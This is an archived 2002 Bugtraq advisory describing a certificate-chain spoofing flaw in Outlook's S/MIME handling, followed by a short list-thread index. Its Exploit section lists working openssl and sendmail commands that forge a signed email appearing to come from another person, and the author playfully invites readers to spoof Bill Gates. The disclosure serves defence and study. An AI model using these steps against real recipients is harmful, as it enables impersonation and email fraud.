Bugtraq mailing list archives
Outlook S/MIME Vulnerability
From: Mike Benham <moxie () thoughtcrime org>
Date: Mon, 2 Sep 2002 10:37:23 -0700 (PDT)
======================================================================= Outlook S/MIME Vulnerability 09/02/02 Mike Benham <moxie () thoughtcrime org> http://www.thoughtcrime.org ======================================================================= Abstract Outlook's S/MIME implementation is vulnerable to the certificate chain spoofing attack, despite Microsoft's claim that IE is the only affected application. The vulnerability allows anyone to forge the digital signature on an email that is to be viewed with Outlook. No warnings are given, no dialogs are shown. ======================================================================== Description For a complete description of the certificate chain attack, see: http://online.securityfocus.com/archive/1/286290 As with the IE SSL vulnerability, an attacker generates a bad certificate chain: [Issuer:VeriSign | Subject:VeriSign]
[Issuer:VeriSign | Subject:www.thoughtcrime.org] [Issuer:www.thoughtcrime.org | Subject:Bill Gates/billgates () microsoft com]
Outlook fails to check the Basic Constraints on the intermediate certificate and accepts the leaf certificate as valid. ========================================================================= Severity As it stands, there is virtually no difference between signed and unsigned email in Outlook. Unless carefully inspected, signed email in Outlook is essentially meaningless. This also applies to any signed email received over the past 5+ years. Prudent users who must continue using Outlook for signed email should manually inspect and verify received certificate chains. ======================================================================== Affected Clients Mozilla is NOT vulnerable. Outlook Express 5 is vulnerable. (Tested on fully patched Win2k SP3 system) ======================================================================== Exploit 1) Put a valid CA-signed certificate and private key in a file "middle.pem" (If you don't have a valid CA-signed certificate, there's one bundled with sslsniff: http://www.thoughtcrime.org/ie.html) 2) Generate a fake leaf certificate signing request: a) openssl genrsa -out key.pem 1024 b) openssl req -new -key key.pem -out leaf.csr 3) Sign the CSR with your "intermediate" certificate: a) openssl x509 -req -in leaf.csr -CA middle.pem -CAkey middle.pem -CAcreateserial -out leaf.pem 4) Sign a spoofed mail message: a) openssl smime -sign -in mail.txt -text -out mail.msg -signer leaf.pem -inkey key.pem -certfile middle.pem -from billgates () microsoft com -to whomever () wherever com -subject "SM Exploit" 5) Send the mail: a) cat mail.msg | sendmail whomever () wherever com I encourage everyone to send Bill Gates an email from himself. =) ========================================================================== Vendor Notification Status Microsoft knows about this, of course, but "isn't even sure whether to call this a 'vulnerability'." Right. - Mike -- http://www.thoughtcrime.org
Current thread:
- Outlook S/MIME Vulnerability Mike Benham (Sep 02)
- Re: Outlook S/MIME Vulnerability Spyder (Sep 03)
- Re: **maillist:: Outlook S/MIME Vulnerability Thomas Seliger (Sep 03)
- Re: **maillist:: Outlook S/MIME Vulnerability Timothy J . Miller (Sep 04)
- Re: **maillist:: Outlook S/MIME Vulnerability Torbjörn Hovmark (Sep 04)